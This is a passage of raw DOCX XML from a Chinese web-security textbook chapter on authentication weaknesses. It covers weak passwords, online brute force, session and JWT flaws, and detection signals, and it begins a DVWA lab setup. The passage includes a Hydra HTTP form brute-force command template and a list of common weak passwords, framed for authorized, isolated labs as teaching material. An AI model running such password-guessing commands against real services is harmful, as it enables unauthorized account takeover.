          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">镜像、HackTheBox/TryHackMe/VulnHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">已获授权的实例），或已获得书面授权的目标系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。实验网络必须与生产网络及互联网物理或逻辑隔离。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任何未经授权对他人在线服务进行口令爆破或会话劫持的行为均属违法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具仅可在授权实验范围内使用；若在公网或他人系统上未经许可运行，将承担全部法律后果。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框结束】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份认证是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全的第一道门。在经典的基于表单的认证模型中，系统向用户提出一个不可伪造的断言挑战：用户必须证明自己拥有某个秘密（口令）或已持有某种凭证（会话令牌）。这一模型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有三条：（1）用户选择的口令是不可猜测的，且与个人信息无关；（2）认证状态由服务器签发的不可预测的随机令牌（Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）维持，该令牌只在服务器强制刷新的时间窗口内有效；（3）第三方认证框架（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT）中，签名或完整性保护机制确实能阻止篡改。本节逐一剖析这些假设被违反的方式——当口令太弱或可被离线/在线穷举，第一条假设失效；当会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被外部预设或长期不轮换，第二条假设失效；当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名算法被误配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或密钥强度不足，第三条假设也告崩溃。从攻击者的视角看，这些都是用很小的代价（时间、计算资源）换取极高权限（用户身份完全接管）的路径；从防御者的视角看，理解这些攻击不仅是为了修复一个密码框或一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie，而是为了围绕“凭据的生命周期”建立起纵深防御。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="193"/>
    <w:bookmarkStart w:id="194" w:name="弱口令与在线爆破当用户选择的秘密不够强"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱口令与在线爆破：当用户选择的秘密不够强</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">口令认证的根本安全前提是“口令空间足够大，以至于攻击者无法穷举”。一个理想的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">-bit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随机秘密拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSup>
          <m:e>
            <m:r>
              <m:t>2</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <m:t>n</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">种可能取值；但人类选择的口令与其迥异——受制于记忆负担、文化习惯、甚至服务端的复杂密码策略绕过，真实的用户口令熵往往只有几十比特甚至更低。加之不同平台上的用户高度倾向于口令重用（见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Florencio–Herley </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等人对大规模口令泄露的实证分析），一旦某个低安全性站点的口令库被拖走，高价值目标的账号也同时沦陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在线爆破（Online</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Brute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Force）正是在用户选择弱口令的前提下，直接利用应用的前端登录接口进行尝试性登录。它不需要系统失陷，不需要寻找注入点——它只需要一个合法的登录入口和一堆候选口令。攻击者的目标可以是枚举已有用户名（用户名枚举本身就是一个信息泄露漏洞），也可以是固定知晓的用户名去碰撞可能的密码。在授权渗透测试中，Hydra（thc-hydra）是事实标准工具，它利用多线程对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录表单、HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Basic/Digest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证、以及十余种其他网络服务（SSH、FTP、MySQL、RDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）进行高速口令尝试。其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单爆破的通用语法如下（真实工具语法，环境相关参数以占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra</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USERNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PASSWORD_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LOGIN_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:username=^USER^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">^PASS^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Login:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FAILURE_STRING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数解释（部分为指定形式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定单个用户名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则指定用户名字典文件；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指定口令字典文件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，此为特定发行版路径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http-post-form</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指示模块类型为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单；其后字符串的语法为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径:POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">body:失败标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^USER^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^PASS^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置的占位符，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;FAILURE_STRING&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是登录失败时响应中唯一出现的字符串（如“Login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">failed”或“Invalid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">password”）。如果登录失败的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应码更适合做判据，可以改用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S=^HTTP/forbidden^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这类失败响应码标记（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S=^HTTP/200 OK^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在特定应用场景中反倒可能是失败信号，需要根据具体应用逻辑判断</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者对速率限制很敏感：如果服务端每个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单位时间仅允许若干次登录尝试，或超过阈值即锁</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计数，则在线爆破的成功概率大幅下降。即便在没有速率限制的“理想”条件下，一个包含上千万条目的字典也需要相当长的尝试时间，因此攻击者并不会总使用全量字典。他们通常会优先尝试“弱口令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1000”——在历年数据泄露统计中出现频率最高的那些密码，英文国家常见如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">123456</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qwerty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">football</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之类，国内环境中则多见于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">123456</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及基于键盘轨迹的字符串。这本质上是把攻击预算集中投放在口令分布最密集的区域，以最小尝试次数换取最大命中概率。这一事实再次表明用户口令选择模型与均匀随机分布的巨大偏差。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在线爆破还有明显的蓝队信标：来自同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> User-Agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的高频登录请求、对大量用户名的短时间试探（意味着反向爆破，即用同一个常见口令去匹配所有已知用户名）、以及登录失败率骤然攀升。因此即便在没有速率限制的应用上，爆破行为本身在审计日志中极其显著——前提是日志被有效集中并实施了异常检测规则。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="194"/>
    <w:bookmarkStart w:id="195" w:name="在线爆破的授权靶机实操"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在线爆破的授权靶机实操</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA（Damn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerable Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Brute Force </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块。本节回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章，确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行于隔离实验环境（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VMware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT/Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络），靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DVWA_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②。在</w:t>
      </w:r>
      <w:r>
